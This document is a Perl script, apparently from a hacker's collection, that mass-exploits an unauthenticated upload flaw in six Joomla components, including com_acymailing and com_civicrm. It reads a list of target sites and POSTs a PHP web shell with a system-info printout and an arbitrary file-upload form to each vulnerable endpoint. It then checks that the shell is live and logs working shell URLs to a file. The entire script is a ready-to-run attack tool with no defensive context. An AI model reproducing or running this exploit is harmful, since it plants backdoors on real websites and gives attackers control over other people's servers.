RCI

1. #!/usr/bin/perl
2. # M-A_labz
3. # This tool will scan for RCI in :
4. # com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews
5. # http://upload.traidnt.net/upfiles/LVc77789.png
6. # Author : b0y h4ck3r
7. use HTTP::Request;
8. use LWP::Simple;
9. use HTTP::Request::Common;
10. use Term::ANSIColor;
11. $ua = LWP::UserAgent->new;
12. print color("bold red"),"[+] M-A Joomla Components RCI Exploits Scanner \n";
13. print color 'reset';
14. print color("green"),"[+] Enter File : ";
15. print color 'reset';
16. $file=<STDIN>;
17. chomp($file);
18. open (file, "<$file") || die "[-] Can't open the List of site file !";
19. my @file = <file>;
20. close file;
21. foreach $webs (@file)
22. {
23. chomp $webs;
24. $site = $webs;
25. print color("green"), "[+] Scanning $site\n";
26. print color 'reset';
27. @paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
28. foreach $path(@paths)
29. {
30. $site_vul = "http://".$site."".$path."?name=tt7.php";
31. $data = "php code";
32. $data.= ' <title>Evil Upload</title> ';
33. $data.= ' <h1>Evil Upload</h1> ';
34. $data.= '<?php ';
35. $data.= "echo '<b><br><br>'.php_uname().'<br></b>'; ";
36. $data.= 'echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; ';
37. $data.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; ';
38. $data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";
39. $data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } ";
40. $data.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } ";
41. $data.= " } ";
42. $data.= "?>";
43. $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);
44. if ($res->is_success){
45. print color("green"), "[+] $site is vul\n";
46. print color 'reset';
47. @vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');
48. foreach $vul(@vulns)
49. {
50. $url = "http://".$site. $vul;
51. $request = HTTP::Request->new(GET=>$url);
52. $useragent = LWP::UserAgent->new();
53. $response = $useragent->request($request);
54. if ($response->content=~m/<title>Evil Upload<\/title>/g){
55. print color("green"), "[+] Found => $url\n\n";
56. print color 'reset';
57. open(BEN,">>result-$site.txt");
58. print BEN "$url\n";
59. close(BEN);
60. }else{
61. print "[-] Not Found \n";
62. }
63. }
64. }
65. }
66. }